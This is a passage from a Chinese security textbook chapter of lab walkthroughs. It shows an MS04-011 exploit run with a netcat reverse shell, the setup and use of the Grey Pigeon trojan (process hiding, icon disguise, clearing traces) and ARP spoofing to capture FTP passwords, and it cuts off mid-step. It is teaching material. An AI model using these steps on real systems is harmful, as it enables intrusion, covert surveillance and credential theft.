《信息安全原理與實踐教程》課件第12章

第12章網(wǎng)絡(luò)攻防原理與實驗

12.1網(wǎng)絡(luò)攻防概述12.2MS04-11系統(tǒng)漏洞攻防實驗

12.3灰鴿子木馬的遠(yuǎn)程控制實驗

12.4利用ARP欺騙獲取用戶名和密碼實驗12.5小結(jié)12.1網(wǎng)絡(luò)攻防概述自古以來，矛和盾就相輔相成，競相發(fā)展。由于網(wǎng)絡(luò)操作系統(tǒng)和網(wǎng)絡(luò)硬件設(shè)備本身存在著漏洞和缺陷，一些熱衷于電腦應(yīng)用和研究的愛好者，就利用這些漏洞，攻擊和入侵其他網(wǎng)絡(luò)系統(tǒng)。通常來講，網(wǎng)絡(luò)攻擊的常用手段包括：

1)獲取口令有四種可以獲得口令的方法：●通過網(wǎng)絡(luò)監(jiān)聽非法得到用戶口令；●利用專用軟件破解口令；●非法獲得口令文件，破譯口令；●缺省口令未加保護。

2)放置木馬程序木馬程序可以直接侵入用戶的電腦并進行破壞，它常被偽裝成工具程序或者游戲等，誘使用戶打開帶有木馬程序的郵件附件或從網(wǎng)上直接下載。一旦用戶打開了這些郵件的附件或者執(zhí)行了這些程序之后，它們就會像古特洛伊人在敵人城外留下的藏滿士兵的木馬一樣留在自己的計算機中，并在自己的計算機系統(tǒng)中隱藏一個可以在Windows啟動時悄悄執(zhí)行的程序。當(dāng)用戶連接到因特網(wǎng)上時，這個程序就會通知黑客，并報告用戶的IP地址以及預(yù)先設(shè)定的端口。黑客在收到這些信息后，利用這個潛伏在其中的程序，就可以任意地修改用戶計算機的參數(shù)設(shè)定，復(fù)制文件甚至窺視整個硬盤中的內(nèi)容等，從而達(dá)到控制用戶計算機的目的。

3)?WWW的欺騙技術(shù)網(wǎng)上用戶可以利用IE等瀏覽器進行各種各樣的Web站點的訪問，如閱讀新聞組、咨詢產(chǎn)品價格、訂閱報紙及進行電子商務(wù)等。然而一般的用戶恐怕不會想到有這樣的問題存在：正在訪問的網(wǎng)頁已經(jīng)被黑客篡改過，網(wǎng)頁上的信息是虛假的。例如黑客將用戶要瀏覽的網(wǎng)頁的URL改寫為指向黑客自己的服務(wù)器，當(dāng)用戶瀏覽目標(biāo)網(wǎng)頁時，實際上就是向黑客服務(wù)器發(fā)出請求，那么黑客就可以達(dá)到欺騙的目的。

4)電子郵件攻擊電子郵件攻擊主要表現(xiàn)為兩種方式：●郵件炸彈；●電子郵件欺騙。

5)通過一個節(jié)點來攻擊其他節(jié)點黑客在攻擊一臺主機后，往往以此主機作為根據(jù)地，攻擊其他主機，目的是隱蔽其入侵路徑。他們可以使用網(wǎng)絡(luò)監(jiān)聽方法，嘗試攻破同一網(wǎng)絡(luò)內(nèi)的其他主機；也可以通過IP欺騙和主機信任關(guān)系，攻擊其他主機。這類攻擊很狡猾，但由于某些技術(shù)很難掌握，如IP欺騙，因此較少被黑客使用。

6)網(wǎng)絡(luò)監(jiān)聽網(wǎng)絡(luò)監(jiān)聽是主機的一種工作模式。在這種模式下，主機可以接收到本網(wǎng)段內(nèi)在同一條物理通道上傳輸?shù)乃行畔?，而不管這些信息的發(fā)送方和接收方是誰。此時，如果兩臺主機進行通信的信息沒有加密，只要使用某些網(wǎng)絡(luò)監(jiān)聽工具，例如NetXray、Sniffer等就可以輕而易舉地截取口令和帳號等信息資料。

7)尋找系統(tǒng)漏洞許多系統(tǒng)都有這樣那樣的安全漏洞(bugs)，其中某些是操作系統(tǒng)或應(yīng)用軟件本身具有的，如Sendmail漏洞、Windows98中的共享目錄密碼驗證漏洞和IE5漏洞等，這些漏洞在補丁未被開發(fā)出來之前一般很難防御黑客的破壞；還有一些漏洞是由于系統(tǒng)管理員配置錯誤引起的，如在網(wǎng)絡(luò)文件系統(tǒng)中，將目錄和文件以可寫的方式調(diào)出，將未加shadow的用戶密碼文件以明碼方式存放在其一目錄下，這都會給黑客帶來可乘之機，應(yīng)及時加以補救。

8)偷取特權(quán)這種攻擊方法利用各種特洛伊木馬程序、后門程序和黑客自己編寫的導(dǎo)致緩沖區(qū)溢出的程序進行攻擊，前者可使黑客非法獲得對用戶機器的完全控制權(quán)，后者可使黑客獲得超級用戶的權(quán)限，從而擁有對整個網(wǎng)絡(luò)的絕對控制權(quán)。這種攻擊手段一旦奏效，危害將極大。在搞清楚網(wǎng)絡(luò)攻擊的手段后，網(wǎng)絡(luò)用戶就可以有針對性地加強網(wǎng)絡(luò)安全防護了。為了網(wǎng)絡(luò)安全，盡量把損失降低到最低限度，我們一定要有安全觀念，并掌握一定的安全防范措施，讓網(wǎng)絡(luò)攻擊者無機可乘。12.2MS04-11系統(tǒng)漏洞攻防實驗

1.實驗?zāi)康睦肕icrosoftWindows系統(tǒng)中存在的多個安全漏洞(比如MS04-11系統(tǒng)漏洞)，攻擊者可能在受影響的系統(tǒng)中提升權(quán)限，以更高權(quán)限執(zhí)行任意代碼。這是一個緩沖區(qū)溢出漏洞，攻擊成功后，攻擊者就可以在系統(tǒng)中采取任何行為，包括安裝程序、瀏覽數(shù)據(jù)、更改數(shù)據(jù)、刪除數(shù)據(jù)或以完全權(quán)限創(chuàng)建新帳號等。

2.實驗環(huán)境一臺Windows2000Server服務(wù)器，沒有打相關(guān)補丁，服務(wù)器IP地址為27；一臺WindowsXP作為攻擊的客戶端，IP地址為05；?MS04-11攻擊軟件；DSScan掃描軟件；NetCat瑞士軍刀軟件。

3.實驗內(nèi)容

MS04-11系統(tǒng)漏洞攻防實驗步驟具體如下：第1步：用DSScan掃描軟件對服務(wù)器進行掃描，利用getos判斷對方的操作系統(tǒng)，看服務(wù)器是否有MS04-11漏洞，掃描的結(jié)果如圖12.1所示。圖12.1DSScan掃描結(jié)果掃描結(jié)果表明IP地址為27的服務(wù)器是Windows2000操作系統(tǒng)，其狀態(tài)是vulnerable(脆弱)，也就是說系統(tǒng)容易受損，容易受到攻擊。第2步：利用NetCat(瑞士軍刀)軟件監(jiān)聽端口，nc的基本命令行形式是nc[-options]hostports,其中host是要掃描的主機名或IP地址，ports要么是一個單獨的端口，要么是一個端口范圍(用m-n的形式指定)，要么是一系列用空格隔開的單個端口。C:\>nc-h[v1.10NT]editbyMeteorconnecttosomewhere: nc[-options]hostnameport[s][ports]...listenforinbound: nc-l-pport[options][hostname][port]options:-d 后臺模式運行@!-eprog 程序重定向，一旦連接，就執(zhí)行[危險!!]-ggateway source-routinghoppoint[s],upto8-Gnum source-routingpointer:4,8,12,...-h 幫助信息

-isecs 掃描端口時的延時的間隔

-l 監(jiān)聽模式，等待連接

-L 連接關(guān)閉后，仍然繼續(xù)監(jiān)聽

-n 指定數(shù)字的IP地址，不能用hostname-ofile 十六進制模式輸出文件，三段

-pport 本地端口

-r 任意指定本地及遠(yuǎn)程端口

-saddr 本地源地址

-t timeout的時間

-u UDP模式

-v 詳細(xì)輸出[-vv，詳細(xì)輸出]-wsecs timeoutforconnectsandfinalnetreads-z 將輸入輸出關(guān)掉—用于掃描時

portnumberscanbeindividualorranges:m-n[inclusive]

如果要監(jiān)聽本地的5555端口，則輸入下列語句

C:\>nc-l-p5555回車后可看到光標(biāo)一直在閃爍，表明該端口處于監(jiān)聽狀態(tài)。再開一個cmd命令窗口，鍵入netstat–an命令，可看到本地端開啟了5555服務(wù)端口，如圖12.2所示。

圖12.2netstat查看本地開的服務(wù)端口第3步：默認(rèn)情況下，本機的防火墻開啟，nc監(jiān)聽的5555服務(wù)端口將被防火墻屏蔽，不能對外作出響應(yīng)。所以必須把5555這個服務(wù)端口開啟，被攻擊的靶機才能與本機進行反向連接。開啟5555服務(wù)端口的方式為：依次選擇“網(wǎng)上鄰居”→“屬性”→“本地連接”→“屬性”→“高級”→“Windows防火墻設(shè)置”，在彈出的對話框中選擇“例外”→“添加端口”，如圖12.3所示。圖12.3開啟5555服務(wù)端口這樣在設(shè)置之后，本機雖然開啟了防火墻，但是5555的TCP服務(wù)端口還是能對外作出響應(yīng)。第4步：在cmd命令窗口模式下運行ms04011.exe可執(zhí)行程序，有如下結(jié)果：

E:\20040430ms04011\20040430ms04011\工具>ms04011.exe

WindowsLsasrv.dllRPC[ms04011]bufferoverflowRemoteExploit

bugdiscoveriedbyeEye,codebysbaa(sysop@)2004/04/24ver0.1Usage:ms04011.exe0targetip(PortConnectBackIP)---->attack2k(testedoncnsp4,ensp4)ms04011.exe1targetip(PortConnectBackIP)---->attackxp(testedoncnsp1)根據(jù)運行后的幫助可知，MS04-11可以對Windows2000與WindowsXP進行攻擊，因為目標(biāo)是Windows2000系統(tǒng)，所以選擇0模式

ms04011.exe027555505說明：參數(shù)0表示攻擊Windows2000系統(tǒng)，27是目標(biāo)機的IP地址，5555是本地用nc開的5555服務(wù)端口，05是本機IP地址，按【回車】鍵對目標(biāo)機發(fā)起緩沖區(qū)溢出攻擊，結(jié)果目標(biāo)機將對本機的5555端口進行反向連接，結(jié)果如圖12.4與圖12.5所示。圖12.4MS04-11攻擊圖12.5nc監(jiān)聽時的響應(yīng)結(jié)果可以看到，當(dāng)MS04-11發(fā)起攻擊時，目標(biāo)服務(wù)器受到溢出攻擊并作出回應(yīng)動作(對本地的5555服務(wù)端口作出連接請求)，所以一直在監(jiān)視本地的5555服務(wù)端口的nc程序就與目標(biāo)服務(wù)器連接成功，通過ipconfig查詢IP地址，發(fā)現(xiàn)當(dāng)前位置在目標(biāo)服務(wù)器的終端上，得到一個shell。12.3灰鴿子木馬的遠(yuǎn)程控制實驗

1.實驗?zāi)康氖褂没银澴雍箝T軟件，在客戶端程序配置出服務(wù)端程序?？膳渲玫男畔⒅饕ㄉ暇€類型(如等待連接還是主動連接)、主動連接時使用的公網(wǎng)IP(域名)、連接密碼、使用的端口、啟動項名稱、服務(wù)名稱、進程隱藏方式、圖標(biāo)等。

2.實驗環(huán)境一臺Windows2000Server服務(wù)器；一臺WindowsXP做攻擊的客戶端，IP地址為05；灰鴿子破解版軟件程序。

3.實驗內(nèi)容灰鴿子木馬的遠(yuǎn)程控制實驗的步驟如下：第1步：啟動灰鴿子客戶端程序，并且配置服務(wù)端程序。圖12.6是灰鴿子木馬的控制端的啟動界面。控制端啟動后界面如圖12.7所示?？刂贫藛雍?，首先要配置服務(wù)器程序，點擊“配置服務(wù)程序”菜單將彈出如圖12.8所示的配置界面。圖12.6灰鴿子木馬啟動界面圖12.7灰鴿子木馬主界面圖12.8配置服務(wù)器程序界面在圖12.8中可以看到，服務(wù)器配置中，有如下選項：●自動上線設(shè)置：表明灰鴿子木馬屬于“反彈木馬”，即服務(wù)器端主動通知控制端，在這個選項下，需要設(shè)置控制端的IP地址或域名、上線圖像、上線分組等，如圖12.9所示。圖12.9設(shè)置訪問控制端IP地址或域名●安裝選項：設(shè)置服務(wù)器端程序的安裝位置、程序圖標(biāo)等。設(shè)置安裝位置可以深度隱藏服務(wù)器的安裝位置；設(shè)置程序圖標(biāo)(如設(shè)置為QQ圖標(biāo))可以迷惑用戶。●啟動項設(shè)置：設(shè)置啟動方式，可以選擇修改注冊表啟動，或者修改服務(wù)進行觸發(fā)啟動，還可以更改進程名稱。●高級選項：可以設(shè)置綁定IE瀏覽器啟動，隱藏服務(wù)端進程等，如圖12.10所示。

圖12.10服務(wù)器存放路徑和文件名

將這些設(shè)置好以后，點擊【生成服務(wù)器】按鈕，就在指定路徑生成的服務(wù)端程序安裝文件。第2步：使用各種方法將服務(wù)器安裝程序傳播出去并誘騙用戶點擊、安裝。我們這里僅僅介紹灰鴿子木馬的危害，對傳播過程不再做詳細(xì)介紹。第3步：服務(wù)器主動通知控制端，建立連接，實現(xiàn)控制。如圖12.11所示，服務(wù)器端主動聯(lián)系控制端，在“自動上線主機”中已經(jīng)可以看到被控端電腦“302-65”。圖12.11服務(wù)器端上線在“文件管理器”中可以看到被控端的所有文件情況，并且可以隨意進行讀、寫、刪除等操作。在“注冊表編輯器”中可以對注冊表進行操作，如圖12.12所示。

圖12.12被控端注冊表界面在“遠(yuǎn)程控制命令”中可以向被控端發(fā)布控制命令。例如，在圖12.13中，發(fā)布了“打開網(wǎng)頁”的命令，下面消息框提示“1條打開網(wǎng)頁命令廣播完成!”。還可以捕獲被控端的屏幕，如圖12.14所示，點擊“捕獲屏幕”菜單，就可以控制被控端的屏幕，如圖12.15所示。點擊屏幕左上角的圖標(biāo)，表示“發(fā)送鼠標(biāo)鍵盤操作”，這樣就可以像控制自己的電腦一樣來控制遠(yuǎn)程的電腦了。此外，灰鴿子木馬還提供了控制視頻語音的功能，如圖12.16～圖12.18所示。圖12.13命令廣播界面

圖12.14捕獲被控端屏幕圖12.15被控端屏幕圖12.16控制被控端視頻語音圖12.17被控端視頻界面圖12.18被控端視頻在完成控制之后，還可以清除遠(yuǎn)程服務(wù)端程序，達(dá)到初步清理痕跡的作用，如圖12.19所示。圖12.19卸載服務(wù)器端程序在圖12.20中已經(jīng)看不到被控端了。圖12.20被控端被卸載

4.清除灰鴿子木馬清除灰鴿子木馬主要從兩個方面進行。

1)在注冊表里清除灰鴿子的服務(wù)首先，點擊“開始”→“運行”，輸入“Regedit.exe”，點擊【確定】按鈕，打開注冊表編輯器，打開HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注冊表項，如圖12.21所示。圖12.21查找注冊表然后，點擊菜單“編輯”→“查找”，在“查找目標(biāo)”文本框中輸入“game.exe”，點擊【確定】按鈕，就可以找到灰鴿子的服務(wù)項了(此例為Game_Server，每個用戶的這個服務(wù)項名稱是不同的)。最后，刪除整個Game_Server項。

2)刪除灰鴿子程序文件刪除灰鴿子程序文件非常簡單，只需要在安全模式下刪除Windows目錄下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新啟動計算機即可。至此，灰鴿子服務(wù)端就被清除干凈。

12.4利用ARP欺騙獲取用戶名和密碼實驗

1.實驗?zāi)康睦肁RP(AddressResolutionProtocol，地址解析協(xié)議)協(xié)議，通過目標(biāo)設(shè)備的IP地址，查詢目標(biāo)設(shè)備的MAC地址等信息，并獲取用戶相關(guān)信息。

2.實驗環(huán)境構(gòu)建局域網(wǎng)絡(luò)環(huán)境，在每臺安裝有TCP/IP協(xié)議的電腦里配置IP如下：

pc1(Win2000系統(tǒng))：27

pc2(WinXP系統(tǒng))：05

FTPserver(Linux系統(tǒng))：33同時，安裝ARPsniffer軟件程序。

3.實驗原理正常情況下，pc2能登錄到FTPServer服務(wù)器。利用ARPsniffer，pc1充當(dāng)pc2與FTPServer的中間人，pc1就可以截獲了pc2的數(shù)據(jù)，分析其中有用的數(shù)據(jù)，如用戶名和密碼。pc1用DOS窗口進入ARPsniffer路徑，對pc2與FTPServer進行欺騙。在欺騙前，pc2與FTPServer的ARP地址緩存表分別如圖12.22與圖12.23所示。

圖12.22pc2的ARP緩存表圖12.23FTPServer的ARP緩存表

4.實驗內(nèi)容第1步：pc1運行ARPsniffer程序，得到如圖12.24所示的幫助。圖12.24ARPsniffer幫助界面

<IP1>：網(wǎng)關(guān)的IP地址，這里就是FTPServer的IP地址33。

<IP2>：被欺騙的IP地址，這里就是pc2的IP地址05。

<SnifferTCPPort>：監(jiān)聽的TCP服務(wù)端口號，這里要對FTP進行監(jiān)聽，所以寫21。

<NetAdp>：本機上的網(wǎng)絡(luò)適配器，本機只有一個NetworkAdapter0:VMwareAcceleratedAMDPCNetAdapter適配器，編號是0。

<LogFile>：生成的日志文件名。第2步：現(xiàn)在對pc2與FTP